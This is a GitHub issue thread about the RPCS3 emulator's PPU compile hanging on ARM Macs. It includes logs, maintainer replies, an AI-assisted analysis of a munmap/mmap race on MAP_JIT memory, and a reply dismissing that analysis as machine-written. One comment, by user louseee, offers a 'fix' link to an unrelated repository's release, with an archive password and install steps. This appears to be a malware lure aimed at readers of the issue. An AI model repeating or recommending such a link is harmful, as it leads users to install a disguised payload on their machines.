### ISSUE TITLE
[Bug] [macOS] [ARM] PPU compile may hang with failure in memory_decommit on first load

### ISSUE THREAD

**Issue by squidbus** [RPCS3/rpcs3#16013]
### Quick summary

Sometimes when loading games with a fresh cache folder on an ARM Mac, the PPU compile will hang. Main game I use to reproduce this is Sonic Unleashed.

### Details

When the compile hangs I usually see a few instances of this in the log:
```
F {PPUW.23.0} SIG: Thread terminated due to fatal error: Verification failed (object: 0x0)
(in file rpcs3/rpcs3/util/vm_native.cpp:348[:3], in function void utils::memory_decommit(void *, usz)) (errno=2=No such file or directory)
```

The compile also notably stops on the total number of modules minus the number of times that error occurs.

### Attach a log file

[RPCS3.log.gz](https://github.com/user-attachments/files/16790560/RPCS3.log.gz)

### System configuration

Apple M3 Max, macOS 15.1

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kd-11** [comment]
I still haven't encountered this one. When the objects are compiled it does "freeze" for about a minute the first run but then proceeds as usual. However, I'm still on 14.x so this may be an issue with MacOS itself changing behavior rather than rpcs3.

**Comment by squidbus** [comment]
I don't actually seem to be able to reproduce this anymore for some reason, its possible another change somehow fixed it but I'm not sure what. Feel free to close if you want and I suppose if it comes up again someone will report it.

**Comment by kd-11** [comment]
Closing as cannot reproduce. Request to reopen if the issue reappears.

**Comment by lakshyashastri** [comment]
Requesting a reopen — reliably reproducible on an M4 Pro (macOS 26.4.1, master 24fbafdb), and I can explain both the original report and why the two obvious fixes don't work.

**The race:** `memory_decommit()`/`memory_reset()` on Apple ARM64 do `munmap()` then `mmap()` at a hint (no `MAP_FIXED` — XNU rejects `MAP_FIXED|MAP_JIT`), asserting the same address returns. Any concurrent allocation can steal the hole; the `ensure()` then kills the calling compiler worker (`Verification failed`, vm_native.cpp), leaving the compile queue waiting forever — the OP's "stops at total minus error count" symptom. Standalone repro of the exact pattern (768 MiB MAP_JIT, munmap+mmap-at-hint, 4 competing threads): address lost in **12 of 300 trials (~4%)**.

**Why the obvious fixes fail (measured):**

1. **`MAP_FIXED` without `MAP_JIT`** (#18423, reverted in #18656): atomic, but strips the jit attribute → the next `mprotect(RWX)` fails `EACCES` (= the #18654 crash).
2. **`mprotect(PROT_NONE)` + `MADV_FREE` instead of unmapping**: I implemented and ran this; it survives compile workloads, then crashes at runtime, because current macOS enforces a **one-shot RWX rule on MAP_JIT regions**:

   ```
   reserve(MAP_JIT) -> mprotect(RWX) -> mprotect(RWX)      = EACCES
   reserve(MAP_JIT) -> mprotect(RWX) -> mprotect(NONE)     = EACCES
   reserve(MAP_JIT) -> mprotect(RW)  -> mprotect(NONE)->RW = OK   (X never involved)
   reserve(MAP_JIT) -> RWX -> munmap+mmap(MAP_JIT) -> RWX  = OK   (fresh mapping resets)
   ```

   Once a MAP_JIT range has been made executable, any further `mprotect` on it fails. Remapping is therefore the *only* way to cycle a JIT region's protections on current macOS — the in-tree comment underselling it as a hack should probably be updated.

**What a real fix needs:** the remap is unavoidable and non-atomic, so serialize the munmap+mmap window against RPCS3's other reservation paths (process-wide mutex for the Apple ARM64 JIT case), plus a bounded retry on address mismatch before killing the thread. Happy to prepare a PR along those lines if maintainers agree with the direction; not submitting one blind given this file's history. Standalone repro sources available on request.

*Disclosure: investigated with AI assistance; all measurements above were verified on real hardware, including the failure of both alternative fixes.*

**Comment by schm1dtmac** [comment]
> Requesting a reopen — reliably reproducible on an M4 Pro (macOS 26.4.1, master [24fbafd](https://github.com/RPCS3/rpcs3/commit/24fbafdb1dab445926e15db4667f33c04ea9bc45)), and I can explain both the original report and why the two obvious fixes don't work.
> 
> **The race:** `memory_decommit()`/`memory_reset()` on Apple ARM64 do `munmap()` then `mmap()` at a hint (no `MAP_FIXED` — XNU rejects `MAP_FIXED|MAP_JIT`), asserting the same address returns. Any concurrent allocation can steal the hole; the `ensure()` then kills the calling compiler worker (`Verification failed`, vm_native.cpp), leaving the compile queue waiting forever — the OP's "stops at total minus error count" symptom. Standalone repro of the exact pattern (768 MiB MAP_JIT, munmap+mmap-at-hint, 4 competing threads): address lost in **12 of 300 trials (~4%)**.
> 
> **Why the obvious fixes fail (measured):**
> 
> 1. **`MAP_FIXED` without `MAP_JIT`** ([Fix race condition in memory_decommit/memory_reset on Apple ARM64 #18423](https://github.com/RPCS3/rpcs3/pull/18423), reverted in [[macOS] Revert #18423 due to reported crashes #18656](https://github.com/RPCS3/rpcs3/pull/18656)): atomic, but strips the jit attribute → the next `mprotect(RWX)` fails `EACCES` (= the [God of War Collection: Fatal error in changing memory protection in `utils::memory_commit` on macOS #18654](https://github.com/RPCS3/rpcs3/issues/18654) crash).
> 2. **`mprotect(PROT_NONE)` + `MADV_FREE` instead of unmapping**: I implemented and ran this; it survives compile workloads, then crashes at runtime, because current macOS enforces a **one-shot RWX rule on MAP_JIT regions**:
>    ```
>    reserve(MAP_JIT) -> mprotect(RWX) -> mprotect(RWX)      = EACCES
>    reserve(MAP_JIT) -> mprotect(RWX) -> mprotect(NONE)     = EACCES
>    reserve(MAP_JIT) -> mprotect(RW)  -> mprotect(NONE)->RW = OK   (X never involved)
>    reserve(MAP_JIT) -> RWX -> munmap+mmap(MAP_JIT) -> RWX  = OK   (fresh mapping resets)
>    ```
>    
>    
>        
>          
>        
>    
>          
>        
>    
>        
>      
>    Once a MAP_JIT range has been made executable, any further `mprotect` on it fails. Remapping is therefore the _only_ way to cycle a JIT region's protections on current macOS — the in-tree comment underselling it as a hack should probably be updated.
> 
> **What a real fix needs:** the remap is unavoidable and non-atomic, so serialize the munmap+mmap window against RPCS3's other reservation paths (process-wide mutex for the Apple ARM64 JIT case), plus a bounded retry on address mismatch before killing the thread. Happy to prepare a PR along those lines if maintainers agree with the direction; not submitting one blind given this file's history. Standalone repro sources available on request.
> 
> _Disclosure: investigated with AI assistance; all measurements above were verified on real hardware, including the failure of both alternative fixes._

You're not getting any issues reopened with low effort artificially generated comments. Write it up yourself by hand and show some respect to anyone else actually reading your comments. 

Nonetheless I am aware after LLVM22 got merged that PPU compilation does sporadically fail again rather regularly, until every module has successfully compiled after a few launches or so, though the error itself is different altogether to the one mentioned in this ticket and should be filed separately (e.g. from VSH: F {PPU[0x1000000] Thread (main_thread) [0x00618944]} SIG: Thread terminated due to fatal error: Segfault writing location 0000007f90240000 at 000000019cf7130c.
Emu Thread Name: 'PPU[0x1000000] main_thread'.
(PPU: _sys_prx_load_module_on_memcontainer))
